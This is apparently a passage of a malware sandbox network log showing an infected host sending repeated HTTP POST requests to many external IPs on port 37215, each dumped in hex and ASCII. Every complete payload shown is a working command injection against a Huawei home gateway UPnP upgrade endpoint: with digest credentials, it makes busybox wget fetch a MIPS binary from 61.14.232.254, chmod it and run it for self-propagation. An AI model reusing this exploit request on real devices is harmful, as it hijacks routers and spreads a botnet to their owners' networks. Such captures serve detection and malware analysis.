6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1855192.168.2.1355270197.201.97.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643914938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1856192.168.2.1344924206.101.109.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.643975019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1857192.168.2.1352102145.192.216.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644622087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1858192.168.2.1335238149.133.145.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644710064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1859192.168.2.135886641.193.115.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644711018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1860192.168.2.1333880157.5.40.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644737959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1861192.168.2.1337780157.117.249.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644757032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1862192.168.2.135038441.228.239.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644819975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1863192.168.2.134249241.73.59.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644825935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1864192.168.2.1341944197.143.215.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644846916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1865192.168.2.1352398197.34.100.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644870996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
